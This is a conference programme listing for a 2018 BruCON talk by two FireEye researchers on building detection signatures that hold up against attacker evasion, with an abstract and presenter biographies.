Presented at
BruCON 0x0A (2018),
Oct. 4, 2018, noon
(60 minutes)
Signatures are dead, or so we're told. It's true that many items that are shared as Indicators of Compromise (file names/paths/sizes/hashes and network IPs/domains) are no longer effective. These rigid indicators break at the first attempt at evasion. Creating resilient detections that stand up to evasion attempts by dedicated attackers and researchers is challenging, but is possible with the right tools, visibility and methodical (read iterative) approach.
As part of FireEye's Advanced Practices Team, we are tasked with creating resilient, high-fidelity detections that run across hundreds of environments and millions of endpoints. In this talk we will share insights on our processes and approaches to detection development, including practical examples derived from real-world attacks.
Presenters:
-
Matthew Dunwoody
Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously worked as an Incident Response consultant with FireEye’s Mandiant consulting group, where he supported and led IR engagements and high-tech crime investigations. Daniel’s areas of expertise include IR investigations, host- and network-based detection research and development, and obfuscation and detection evasion research and tradecraft development. He is the author of the Invoke-Obfuscation, Invoke-CradleCrafter and Invoke-DOSfuscation obfuscation frameworks and the co-author of the Revoke-Obfuscation PowerShell obfuscation detection framework.
-
Daniel Bohannon / DBO
as Daniel Bohannon
Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously worked as an Incident Response consultant with FireEye’s Mandiant consulting group, where he supported and led IR engagements and high-tech crime investigations. Daniel’s areas of expertise include IR investigations, host- and network-based detection research and development, and obfuscation and detection evasion research and tradecraft development. He is the author of the Invoke-Obfuscation, Invoke-CradleCrafter and Invoke-DOSfuscation obfuscation frameworks and the co-author of the Revoke-Obfuscation PowerShell obfuscation detection framework.
Links:
Similar Presentations: